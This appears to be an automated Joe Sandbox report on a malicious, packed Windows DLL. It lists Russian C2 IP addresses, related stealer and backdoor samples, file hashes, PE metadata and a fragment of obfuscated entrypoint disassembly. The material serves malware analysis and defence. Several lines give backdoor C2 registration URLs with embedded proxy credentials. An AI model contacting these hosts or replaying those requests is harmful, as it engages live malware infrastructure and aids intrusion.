Name	Source	Malicious	Antivirus Detection	Reputation
http://77.238.224.56PM	rundll32.exe, 00000004.00000002.3932131837.000000000D0A2000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.3934227145.000000000D90C000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3934146478.000000000D598000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://77.238.224.56http://77.238.229.6377.238.250.123:80185.231.155.234:205291P	rundll32.exe, 00000005.00000002.3934857035.000000000D9AC000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://77.238.229.6377.238.250.123:80Go-http-client/1.1http://195.2.70.38Go-http-client/1.1http://91	rundll32.exe, 00000007.00000002.3934146478.000000000D598000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://195.2.70.38PM	rundll32.exe, 00000004.00000002.3932131837.000000000D140000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.3932347032.000000000D808000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.3934227145.000000000D90C000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3931954299.000000000D414000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3932978999.000000000D4BE000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://195.2.70.38http://91.142.74.28G	rundll32.exe, 00000004.00000002.3932131837.000000000D012000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://77.238.229.6377.238.250.123:80http://195.2.70.38http://91.142.74.28http://77.238.224.56PM	rundll32.exe, 00000007.00000002.3934146478.000000000D60C000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://77.238.229.6377.238.250.123:80PM	rundll32.exe, 00000004.00000002.3932131837.000000000D012000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.3932131837.000000000D0A2000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.3932347032.000000000D88C000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3932978999.000000000D4BE000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://77.238.229.6377.238.250.123:80Go-http-client/1.1X-Content-Type-OptionsTransfer-Encodinghttp:/	rundll32.exe, 00000004.00000002.3935140896.000000000D20C000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://77.238.224.56	rundll32.exe, 00000007.00000002.3931954299.000000000D45A000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3934146478.000000000D598000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://77.238.224.56http://91.142.74.28	rundll32.exe, 00000004.00000002.3932131837.000000000D140000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://77.238.224.56Go-http-client/1.1PM	rundll32.exe, 00000005.00000002.3932347032.000000000D808000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://91.142.74.28N	rundll32.exe, 00000007.00000002.3932978999.000000000D4BE000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://91.142.74.28http://77.238.224.56PM	rundll32.exe, 00000005.00000002.3935276148.000000000DA06000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://195.2.70.38http://91.142.74.28http://77.238.229.6377.238.250.123:80	rundll32.exe, 00000005.00000002.3935276148.000000000DA06000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://77.238.229.63	rundll32.exe, 00000007.00000002.3931954299.000000000D45A000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3932978999.000000000D4BE000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3934146478.000000000D598000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://77.238.250.123	rundll32.exe, 00000007.00000002.3931954299.000000000D464000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3934146478.000000000D663000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3931954299.000000000D45A000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://77.238.224.56Go-http-client/1.1Go-http-client/1.1Go-http-client/1.1P	rundll32.exe, 00000007.00000002.3931954299.000000000D414000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://91.142.74.28Go-http-client/1.1http://77.238.224.56PM	rundll32.exe, 00000007.00000002.3934146478.000000000D598000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://77.238.250.123http://195.2.70.38	rundll32.exe, 00000005.00000002.3932347032.000000000D8AE000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3932978999.000000000D4F0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3931954299.000000000D464000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3934146478.000000000D663000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3931954299.000000000D45A000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://77.238.229.6377.238.250.123:80v	rundll32.exe, 00000007.00000002.3934146478.000000000D60C000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://77.238.224.56Go-http-client/1.1http://77.238.229.6377.238.250.123:80Go-http-client/1.1If-Modi	rundll32.exe, 00000004.00000002.3932131837.000000000D140000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://91.142.74.28PM	rundll32.exe, 00000004.00000002.3932131837.000000000D0A2000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.3934227145.000000000D90C000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.3932347032.000000000D88C000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3932978999.000000000D4BE000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://195.2.70.38P	rundll32.exe, 00000004.00000002.3932131837.000000000D012000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.3934227145.000000000D90C000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://77.238.229.6377.238.250.123:80	rundll32.exe, 00000004.00000002.3932131837.000000000D012000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.3932347032.000000000D88C000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3932978999.000000000D4BE000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://195.2.70.38Go-http-client/1.1PM	rundll32.exe, 00000007.00000002.3934146478.000000000D598000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://91.142.74.28	rundll32.exe, 00000007.00000002.3931954299.000000000D45A000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3932978999.000000000D4BE000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3934146478.000000000D598000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://195.2.70.38	rundll32.exe, 00000007.00000002.3931954299.000000000D464000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3934146478.000000000D663000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3934146478.000000000D60C000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3931954299.000000000D414000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3931954299.000000000D45A000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3932978999.000000000D4BE000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3934146478.000000000D598000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
91.142.74.28	unknown	Russian Federation	48720	VTSL1-ASRU	true
185.231.155.234	unknown	Russian Federation	48282	VDSINA-ASRU	true
77.238.229.63	unknown	Russian Federation	42429	TELERU-ASRU	true
195.2.70.38	unknown	Russian Federation	48282	VDSINA-ASRU	true
77.238.250.123	unknown	Russian Federation	42429	TELERU-ASRU	true
77.238.224.56	unknown	Russian Federation	42429	TELERU-ASRU	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1473486
Start date and time:	2024-07-15 12:49:56 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 45s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	12
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.dll
Detection:	MAL
Classification:	mal76.evad.winDLL@14/1@0/6
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .dll Sleeps bigger than 100000000ms are automatically reduced to 1000ms

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
VT rate limit hit for: file.dll

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
91.142.74.28	file.dll	Get hash	malicious	Unknown	Browse	91.142.74.28/
	file.dll	Get hash	malicious	Unknown	Browse	91.142.74.28/
	PZjMIa3MvC.exe	Get hash	malicious	GO Backdoor	Browse	91.142.74.28:30001/api/helper-first-register?buildVersion=0mUz.kUJ2O6l&md5=9b5ce04ec39c07546e6e12b6b60a6af0&proxyPassword=G6rdBV3M&proxyUsername=eKoRF4SY&userId=SOwRDeKMFIGrVg10wggRwau6SkfZdWRGfcF02R88sM9JdZmh
	heic.exe	Get hash	malicious	GO Backdoor	Browse	91.142.74.28:30001/api/helper-first-register?buildVersion=0SfI.qXU2qCl&md5=a64beab5d4516beca4c40b25dc0c1cd8&proxyPassword=NSU8Wq2U&proxyUsername=9nDNinxL&userId=mI62iJuWkLVJyhV2
	poration.exe	Get hash	malicious	LummaC, GO Backdoor, LummaC Stealer	Browse	91.142.74.28:30001/api/helper-first-register?buildVersion=03zq.qg826lp&md5=8f590a1aa472160887481c6e2f5f38d8&proxyPassword=QcA2y2Ws&proxyUsername=Sdow5dAF&userId=nWqFhTmNaQbSt2Ihda7aed7vpyuhphsatZmVrHbTykEH19TJ2xgu3Zjq48nS
	o8JAdiyezt.exe	Get hash	malicious	LummaC	Browse	91.142.74.28:30001/api/helper-first-register?buildVersion=0mUz.kUJ2O6l&md5=7ca367a34e36125fa9a9db11d6ca360d&proxyPassword=G6rdBV3M&proxyUsername=eKoRF4SY&userId=SOwRDeKMFIGrVg10wggRwau6SkfZdWRGfcF02R88sM9JdZmh
	4m8RBorBUl.exe	Get hash	malicious	LummaC	Browse	91.142.74.28:30001/api/helper-first-register?buildVersion=0mUz.kUJ2O6l&md5=3e5aa81f88377e3ca36da63dc29a2a89&proxyPassword=G6rdBV3M&proxyUsername=eKoRF4SY&userId=SOwRDeKMFIGrVg10wggRwau6SkfZdWRGfcF02R88sM9JdZmh
	q49LB2eQuo.exe	Get hash	malicious	Unknown	Browse	91.142.74.28:30001/api/helper-first-register?buildVersion=0mUz.kUJ2O6l&md5=3e5aa81f88377e3ca36da63dc29a2a89&proxyPassword=G6rdBV3M&proxyUsername=eKoRF4SY&userId=SOwRDeKMFIGrVg10wggRwau6SkfZdWRGfcF02R88sM9JdZmh
	rU53IkLA9a.exe	Get hash	malicious	LummaC	Browse	91.142.74.28:30001/api/helper-first-register?buildVersion=0mUz.kUJ2O6l&md5=168b30717cd1d87c367fb2db2a800bd4&proxyPassword=G6rdBV3M&proxyUsername=eKoRF4SY&userId=SOwRDeKMFIGrVg10wggRwau6SkfZdWRGfcF02R88sM9JdZmh
185.231.155.234	ChOQ8w8NqZ.exe	Get hash	malicious	Unknown	Browse
77.238.229.63	file.dll	Get hash	malicious	Unknown	Browse	77.238.229.63/
	file.dll	Get hash	malicious	Unknown	Browse	77.238.229.63/
	PZjMIa3MvC.exe	Get hash	malicious	GO Backdoor	Browse	77.238.229.63:30001/api/helper-first-register?buildVersion=0mUz.kUJ2O6l&md5=9b5ce04ec39c07546e6e12b6b60a6af0&proxyPassword=G6rdBV3M&proxyUsername=eKoRF4SY&userId=SOwRDeKMFIGrVg10wggRwau6SkfZdWRGfcF02R88sM9JdZmh
	o8JAdiyezt.exe	Get hash	malicious	LummaC	Browse	77.238.229.63:30001/api/helper-first-register?buildVersion=0mUz.kUJ2O6l&md5=7ca367a34e36125fa9a9db11d6ca360d&proxyPassword=G6rdBV3M&proxyUsername=eKoRF4SY&userId=SOwRDeKMFIGrVg10wggRwau6SkfZdWRGfcF02R88sM9JdZmh
	4m8RBorBUl.exe	Get hash	malicious	LummaC	Browse	77.238.229.63:30001/api/helper-first-register?buildVersion=0mUz.kUJ2O6l&md5=3e5aa81f88377e3ca36da63dc29a2a89&proxyPassword=G6rdBV3M&proxyUsername=eKoRF4SY&userId=SOwRDeKMFIGrVg10wggRwau6SkfZdWRGfcF02R88sM9JdZmh
	q49LB2eQuo.exe	Get hash	malicious	Unknown	Browse	77.238.229.63:30001/api/helper-first-register?buildVersion=0mUz.kUJ2O6l&md5=3e5aa81f88377e3ca36da63dc29a2a89&proxyPassword=G6rdBV3M&proxyUsername=eKoRF4SY&userId=SOwRDeKMFIGrVg10wggRwau6SkfZdWRGfcF02R88sM9JdZmh
	rU53IkLA9a.exe	Get hash	malicious	LummaC	Browse	77.238.229.63:30001/api/helper-first-register?buildVersion=0mUz.kUJ2O6l&md5=168b30717cd1d87c367fb2db2a800bd4&proxyPassword=G6rdBV3M&proxyUsername=eKoRF4SY&userId=SOwRDeKMFIGrVg10wggRwau6SkfZdWRGfcF02R88sM9JdZmh
195.2.70.38	file.dll	Get hash	malicious	Unknown	Browse	195.2.70.38/
	file.dll	Get hash	malicious	Unknown	Browse	195.2.70.38/
	Image is copyrighted.exe	Get hash	malicious	LummaC, GO Backdoor, LummaC Stealer	Browse	195.2.70.38:30001/api/helper-first-register?buildVersion=0ZQk.wWJ2fdm&md5=f98035f22fcf11f0517bd800a8f92ca7&proxyPassword=R9iFXF6P&proxyUsername=Ul0u22aL&userId=i6cYnot2vd9Mo2PxiZ5jirphnl7Ccgwt20zY0iDM2ASS4lu9
	PZjMIa3MvC.exe	Get hash	malicious	GO Backdoor	Browse	195.2.70.38:30001/api/helper-first-register?buildVersion=0mUz.kUJ2O6l&md5=9b5ce04ec39c07546e6e12b6b60a6af0&proxyPassword=G6rdBV3M&proxyUsername=eKoRF4SY&userId=SOwRDeKMFIGrVg10wggRwau6SkfZdWRGfcF02R88sM9JdZmh
	heic.exe	Get hash	malicious	GO Backdoor	Browse	195.2.70.38:30001/api/helper-first-register?buildVersion=0SfI.qXU2qCl&md5=a64beab5d4516beca4c40b25dc0c1cd8&proxyPassword=NSU8Wq2U&proxyUsername=9nDNinxL&userId=mI62iJuWkLVJyhV2
	poration.exe	Get hash	malicious	LummaC, GO Backdoor, LummaC Stealer	Browse	195.2.70.38:30001/api/helper-first-register?buildVersion=03zq.qg826lp&md5=8f590a1aa472160887481c6e2f5f38d8&proxyPassword=QcA2y2Ws&proxyUsername=Sdow5dAF&userId=nWqFhTmNaQbSt2Ihda7aed7vpyuhphsatZmVrHbTykEH19TJ2xgu3Zjq48nS
	ChOQ8w8NqZ.exe	Get hash	malicious	Unknown	Browse	195.2.70.38:30001/api/helper-first-register?buildVersion=0D14.gjm2oNi&md5=b06e67f9767e5023892d9698703ad098&proxyPassword=lzuMLKyh&proxyUsername=5Vx2nN8C&userId=mXE0iIPukTkyydhF
	o8JAdiyezt.exe	Get hash	malicious	LummaC	Browse	195.2.70.38:30001/api/helper-first-register?buildVersion=0mUz.kUJ2O6l&md5=7ca367a34e36125fa9a9db11d6ca360d&proxyPassword=G6rdBV3M&proxyUsername=eKoRF4SY&userId=SOwRDeKMFIGrVg10wggRwau6SkfZdWRGfcF02R88sM9JdZmh
	4m8RBorBUl.exe	Get hash	malicious	LummaC	Browse	195.2.70.38:30001/api/helper-first-register?buildVersion=0mUz.kUJ2O6l&md5=3e5aa81f88377e3ca36da63dc29a2a89&proxyPassword=G6rdBV3M&proxyUsername=eKoRF4SY&userId=SOwRDeKMFIGrVg10wggRwau6SkfZdWRGfcF02R88sM9JdZmh

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELERU-ASRU	file.dll	Get hash	malicious	Unknown	Browse	77.238.224.56
	file.dll	Get hash	malicious	Unknown	Browse	77.238.224.56
	PZjMIa3MvC.exe	Get hash	malicious	GO Backdoor	Browse	77.238.224.56
	poration.exe	Get hash	malicious	LummaC, GO Backdoor, LummaC Stealer	Browse	77.238.224.56
	o8JAdiyezt.exe	Get hash	malicious	LummaC	Browse	77.238.224.56
	4m8RBorBUl.exe	Get hash	malicious	LummaC	Browse	77.238.224.56
	q49LB2eQuo.exe	Get hash	malicious	Unknown	Browse	77.238.224.56
	rU53IkLA9a.exe	Get hash	malicious	LummaC	Browse	77.238.224.56
VTSL1-ASRU	file.dll	Get hash	malicious	Unknown	Browse	91.142.74.28
	file.dll	Get hash	malicious	Unknown	Browse	91.142.74.28
	PZjMIa3MvC.exe	Get hash	malicious	GO Backdoor	Browse	91.142.73.198
	heic.exe	Get hash	malicious	GO Backdoor	Browse	91.142.74.28
	poration.exe	Get hash	malicious	LummaC, GO Backdoor, LummaC Stealer	Browse	91.142.74.28
	o8JAdiyezt.exe	Get hash	malicious	LummaC	Browse	91.142.74.28
	4m8RBorBUl.exe	Get hash	malicious	LummaC	Browse	91.142.74.28
	q49LB2eQuo.exe	Get hash	malicious	Unknown	Browse	91.142.74.28
	rU53IkLA9a.exe	Get hash	malicious	LummaC	Browse	91.142.74.28
VDSINA-ASRU	file.dll	Get hash	malicious	Unknown	Browse	62.113.116.83
	file.dll	Get hash	malicious	Unknown	Browse	94.103.90.9
	mlk3kK6uLZ.exe	Get hash	malicious	Amadey, Mars Stealer, PureLog Stealer, Quasar, RedLine, Stealc, Vidar	Browse	195.2.76.207
	https://bevelia.net/app/	Get hash	malicious	Unknown	Browse	178.208.83.57
	https://bevelia.net/app/	Get hash	malicious	Unknown	Browse	178.208.83.57
	5uKDxM17pT.exe	Get hash	malicious	AveMaria, UACMe	Browse	109.234.38.71
	file.exe	Get hash	malicious	LummaC, Python Stealer, Amadey, Monster Stealer, PureLog Stealer, RedLine, SmokeLoader	Browse	195.2.71.70
	setup.exe	Get hash	malicious	LummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, PureLog Stealer, RedLine	Browse	195.2.71.70
	FpbdV1sU4k.exe	Get hash	malicious	Unknown	Browse	195.2.71.70
TELERU-ASRU	file.dll	Get hash	malicious	Unknown	Browse	77.238.224.56
	file.dll	Get hash	malicious	Unknown	Browse	77.238.224.56
	PZjMIa3MvC.exe	Get hash	malicious	GO Backdoor	Browse	77.238.224.56
	poration.exe	Get hash	malicious	LummaC, GO Backdoor, LummaC Stealer	Browse	77.238.224.56
	o8JAdiyezt.exe	Get hash	malicious	LummaC	Browse	77.238.224.56
	4m8RBorBUl.exe	Get hash	malicious	LummaC	Browse	77.238.224.56
	q49LB2eQuo.exe	Get hash	malicious	Unknown	Browse	77.238.224.56
	rU53IkLA9a.exe	Get hash	malicious	LummaC	Browse	77.238.224.56
VDSINA-ASRU	file.dll	Get hash	malicious	Unknown	Browse	62.113.116.83
	file.dll	Get hash	malicious	Unknown	Browse	94.103.90.9
	mlk3kK6uLZ.exe	Get hash	malicious	Amadey, Mars Stealer, PureLog Stealer, Quasar, RedLine, Stealc, Vidar	Browse	195.2.76.207
	https://bevelia.net/app/	Get hash	malicious	Unknown	Browse	178.208.83.57
	https://bevelia.net/app/	Get hash	malicious	Unknown	Browse	178.208.83.57
	5uKDxM17pT.exe	Get hash	malicious	AveMaria, UACMe	Browse	109.234.38.71
	file.exe	Get hash	malicious	LummaC, Python Stealer, Amadey, Monster Stealer, PureLog Stealer, RedLine, SmokeLoader	Browse	195.2.71.70
	setup.exe	Get hash	malicious	LummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, PureLog Stealer, RedLine	Browse	195.2.71.70
	FpbdV1sU4k.exe	Get hash	malicious	Unknown	Browse	195.2.71.70

Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	data
Category:	dropped
Size (bytes):	408
Entropy (8bit):	6.236332607274253
Encrypted:	false
SSDEEP:	12:EeT3LOX7Yj8+F21JyP2Paiq0Wur/F8VIN:LG7Yrw1PWur9tN
MD5:	4B37306C60F1F62E6F4A5287DD56A451
SHA1:	D3AC1383EE830AE538CDC39D6E48F3A07BC9C4EA
SHA-256:	2C6526C60CF9CAB5AFE99FC128CA0737B7F4F731D6EBA62BF74DB87CF00FFF6F
SHA-512:	F247D89D0DA710C83CF07BE1397A7BC7AADED6BB60E8D6FB8AACE1B4447AF9C865199CA2B7CFE1DB13F730F93DD75FFC9897DD893C1680DB6E6EE3F3BD965BB2
Malicious:	false
Reputation:	low
Preview:	..^0..)..W...W.-S0T.A6Y.L_.2X!" W.:WV.6WG.V5\^ZSM6$-^1%^^...M);)Z=$.V .=O(\>.TU ...3.. ..%1]T <#L943FV[.W...R8.3G#.._..QW. .[)Z+@..TT!7.]Q7.@V..Q#Y.QW.B..S.Z6#.)-.>.(.7..SV. A6Y/L ..^..8Y.<.M-4T[">].94[YUGU.X\!=2Q;7.]))-@..5V.."_.;ZB ...=+#.PT..S.1....S. _A.8.L+.<^,..Y,(.M].![.!!]T(7[..4G(;Z\+..Q.6.P...@S.>U..1Z.._B..5..'!.......$....SU).A//"L...^^.ZY.0.M."6[T2"]2..[,=6GT..\.. V\[.Y..,@,.?R=V.[.._].*5

Static File Info

General

File type:	PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Entropy (8bit):	7.902787372673727
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 99.60% Generic Win/DOS Executable (2004/3) 0.20% DOS Executable Generic (2002/1) 0.20% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.dll
File size:	13'860'360 bytes
MD5:	e6743e380f2418b616dca113dbbc93cb
SHA1:	6c051a6d3a183c24292d6821865a5a183b4ebb9c
SHA256:	eb7183f807b13b4524393b8da4cc242d96283a13ecd7331db1fcefd43986d0c9
SHA512:	99f35577b520efd679179c3bc3996499daf895fdb17d0fd20960acd65caec9ba5ed6c7bdeaefe0229f753658fb88f11594c8160fab57ac8ebc1a77a729e6abdd
SSDEEP:	196608:DDErb7pO6pV9Mqhdq3PusYB8NggX4WR+2EZ1hggBMY+gj7LWWtYH4c3nUOTBDAaX:DmUSDBYSBIoM5Shgg+dW64cXUoBDAaX
TLSH:	52D633D22FC741EAD5D209B4E31767D707F3945A8EC688343A8D3542B061FB3A1AEC66
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#...(..N..v...b...Y........N...,l.........................P....../.....@... .....................T.y.a..

File Icon


Icon Hash:	7ae282899bbab082

Static PE Info

General

Entrypoint:	0x6d4859d0
Entrypoint Section:	.rdata2
Digitally signed:	true
Imagebase:	0x6c2c0000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED, DLL
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x0 [Thu Jan 1 00:00:00 1970 UTC]
TLS Callbacks:	0x6da62f8c, 0x6c7abd60, 0x6c7abd10
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	1
File Version Major:	6
File Version Minor:	1
Subsystem Version Major:	6
Subsystem Version Minor:	1
Import Hash:	6c871eb5afcc648e749d578ab8277277

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=VeriSign Class 3 Code Signing 2010 CA, OU=Terms of use at https://www.verisign.com/rpa (c)10, OU=VeriSign Trust Network, O="VeriSign, Inc.", C=US
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	22/12/2013 19:00:00 22/12/2016 18:59:59
Subject Chain	CN=Oracle Corporation, OU=VirtualBox, OU=Digital ID Class 3 - Microsoft Software Validation v2, O=Oracle Corporation, L=Redwood Shores, S=California, C=US
Version:	3
Thumbprint MD5:	50BFA74751D185A89CCB20B4301B4AAE
Thumbprint SHA-1:	7E92B66BE51B79D8CE3FF25C15C2DF6AB8C7F2F2
Thumbprint SHA-256:	59B96B88E47C42FB42BBA1C6FC05BBDF24CA16A91507D633BAFBB39757F7339E
Serial:	51CA009816FDBD80F120E015EE75823E

Entrypoint Preview

Instruction
push ebp
pushfd
mov ebp, 6B9318BCh
shr ebp, 42h
bswap ebp
mov ebp, dword ptr [esp+ebp*2-5F8DC830h]
mov dword ptr [esp+04h], 168EA86Dh
push dword ptr [esp+00h]
popfd
lea esp, dword ptr [esp+04h]
call 00007F4751F1E2B2h
inc eax
mov eax, edx
neg byte ptr [esp+02h]
ror word ptr [esp+15h], 0049h
shl dword ptr [esp+00h], 1Ah
mov ecx, dword ptr [eax]
mov edx, dword ptr [esp+18h]
lea eax, dword ptr [0D912A20h+edx*4]
mov dword ptr [esp+edx-6CF39CF1h], eax
mov eax, dword ptr [edi+edx-6CF39CDBh]
adc ecx, eax
movsx eax, word ptr [esp+edx-6CF39CDDh]
sub edx, eax
call 00007F4751E0E763h
dec eax
mov dword ptr [esp+edx-000054CDh], 00931ABFh
inc ecx
rol dl, 1
dec eax
xchg dword ptr [esp+08h], ebp
dec eax
add ebp, 0029843Ah
jmp ebp
dec ecx
xor ebp, ebx
dec esi
mov dword ptr [esp+ebx-5197AFB5h], esi
dec eax
adc esi, ecx
dec esp
lea edx, dword ptr [9A32CE25h+edi*2]
push ebp
inc ebx
mov ebx, dword ptr [edi+esi*2+095DD396h]
mul eax
dec eax
mov dword ptr [esp+ebp-51971F98h], 001EED02h
inc ebx
movzx edi, byte ptr [ebx+eax-5197AFBAh]
inc ecx
xor bh, ch
shr dl, 00000026h
je 00007F475140FB98h
mov dword ptr [eax+eax+00h], edx

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x179a254	0x61	.rdata2
IMAGE_DIRECTORY_ENTRY_IMPORT	0xea9304	0x3c	.rdata2
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0xd33600	0x4808	.rdata0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x1bc4000	0x43c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x19145b4	0x18	.rdata2
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xe90000	0x10	.rdata1
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x4ec4a8	0x0	d41d8cd98f00b204e9800998ecf8427e	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x4ee000	0x2cf6c	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0x51b000	0x2ae2d4	0x0	d41d8cd98f00b204e9800998ecf8427e	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.bss	0x7ca000	0x36090	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
